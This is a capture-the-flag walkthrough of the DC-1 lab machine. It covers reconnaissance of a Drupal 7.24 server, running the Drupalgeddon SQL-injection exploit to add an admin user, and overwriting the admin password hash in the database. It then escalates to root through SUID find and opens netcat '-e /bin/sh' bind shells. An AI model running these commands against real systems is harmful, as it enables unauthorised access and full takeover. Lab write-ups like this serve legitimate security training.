DC-1
Information gathering
Nmap scan report for 192.168.33.136
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:34:9E:E8 (VMware)
IP: 192.168.33.136
Ports:
22/tcp open ssh 80/tcp open http 111/tcp open rpcbind
22: tried passwordless SSH login???
Could try a hydra brute-force here, but it doesn't crack anything.
80: browse to the web page directly
Scanned with dirsearch:
[08:46:04] 200 - 1KB - /COPYRIGHT.txt
[08:46:14] 200 - 17KB - /INSTALL
[08:46:15] 200 - 1KB - /INSTALL.mysql.txt
[08:46:15] 200 - 2KB - /INSTALL.pgsql.txt
[08:46:15] 200 - 17KB - /INSTALL.txt
[08:46:16] 200 - 18KB - /LICENSE
[08:46:16] 200 - 18KB - /LICENSE.txt
[08:46:16] 200 - 8KB - /MAINTAINERS.txt
[08:46:22] 200 - 5KB - /README
[08:46:23] 200 - 5KB - /README.txt
[08:46:33] 200 - 9KB - /UPGRADE
[08:46:33] 200 - 9KB - /UPGRADE.txt
[08:51:42] 301 - 319B - /includes -> http://192.168.33.136/includes/
[08:51:46] 200 - 7KB - /index.php
[08:52:37] 301 - 315B - /misc -> http://192.168.33.136/misc/
[08:52:41] 301 - 318B - /modules -> http://192.168.33.136/modules/
[08:52:57] 200 - 7KB - /node
[08:53:50] 301 - 319B - /profiles -> http://192.168.33.136/profiles/
[08:54:06] 200 - 2KB - /robots.txt
[08:54:11] 301 - 318B - /scripts -> http://192.168.33.136/scripts/
[08:54:31] 301 - 316B - /sites -> http://192.168.33.136/sites/
[08:54:32] 200 - 952B - /sites/all/modules/README.txt
[08:54:32] 200 - 0B - /sites/example.sites.php
[08:54:32] 200 - 904B - /sites/README.txt
[08:54:32] 200 - 767B - /sites/all/themes/README.txt
[08:55:04] 301 - 317B - /themes -> http://192.168.33.136/themes/
[08:55:22] 200 - 7KB - /user
[08:55:22] 200 - 7KB - /user/
[08:55:23] 200 - 7KB - /user/login/
[08:55:37] 200 - 2KB - /web.config
[08:55:58] 200 - 42B - /xmlrpc.php
robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
flag1
msfconsole:
use <module>            select the matching exploit module
show options            view the module's options
set rhosts <target IP>  set the remote host
run                     launch the exploit
exploit                 launch the exploit (same as run)
shell                   drop into a shell on the target
Use python to spawn an interactive shell (makes the later steps easier)
Method 1:
shell  # the shell we have is not local, it runs over the HTTP connection; we need a persistent, interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
Method 2:
find /var/www/test -exec nc -lvp 9999 -e /bin/sh \;
nc 192.168.0.119 9999
/var/www/profiles/testing:
version = "7.24"
project = "drupal"
datestamp = "1384983240"
flag2
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
Connect to the database and look at the users table: the admin password is stored as a hash.
flag3
Method 1: [change the admin password]
Checked the official docs + StackOverflow
and found Drupal's password-hashing script:
php scripts/password-hash.sh 'pass'
www-data@DC-1:/var/www$ php scripts/password-hash.sh 'passwd'
php scripts/password-hash.sh 'passwd'
password: passwd hash: $S$DYUw2bI4eMoDktLEjoauViDb4yDZCQBI0bA7yoJa3oZNRHcZQgQH
www-data@DC-1:/var/www$ php scripts/password-hash.sh ppap
php scripts/password-hash.sh ppap
password: ppap hash: $S$DCKCzF/33eff52x/Po.lQ5bYwDBAy8oVs/8mZ7.GNaXFkjxyixXi
We can't reverse the hash, but we can update the admin password in the database:
update users SET pass='$S$D5iUQJACoD2gCDtE0WaoCMmsoNPVD7Q84aXuHjuoIKwHhD9aKh9Z' where name='admin';
Method 2: [add a user with admin privileges]
// check the exact Drupal version
cat includes/bootstrap.inc | grep VERSION
define('VERSION', '7.24');
$has_openssl = version_compare(PHP_VERSION, '5.3.4', '>=') && function_exists('openssl_random_pseudo_bytes');
searchsploit Drupal
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
┌──(root💀AGsite)-[/usr/share/exploitdb/exploits/php/webapps]
└─# python 34992.py -t http://192.168.33.136 -u userAG -p 123456
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
flag4
Found in /etc/passwd:
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
Opening the file shows:
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
thefinalflag
Presumably we need to escalate privileges now.
[SUID privilege escalation]
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
www-data@DC-1:/home/flag4$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
find is SUID root, so it can be used to escalate.
www-data@DC-1:/home/flag4$ find -name flag4.txt -exec "whoami" \;
find -name flag4.txt -exec "whoami" \;
root
Method 1: [escalate directly]
Escalate:
www-data@DC-1:/home/flag4$ find -name flag4.txt -exec "/bin/sh" \;
find -name flag4.txt -exec "/bin/sh" \;
# whoami
whoami
root
Now thefinalflag.txt can be opened:
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
Method 2: [start a privileged netcat listener]
www-data@DC-1:/home/flag4$ find flag4.txt -exec netcat -lvp 2233 -e "/bin/sh" \;
<find flag4.txt -exec netcat -lvp 2233 -e "/bin/sh" \;
listening on [any] 2233 ...
192.168.33.128: inverse host lookup failed: Host name lookup failure
connect to [192.168.33.136] from (UNKNOWN) [192.168.33.128] 49168
In another terminal (one without msfconsole):
netcat 192.168.33.136 2233
From then on, just run commands as normal.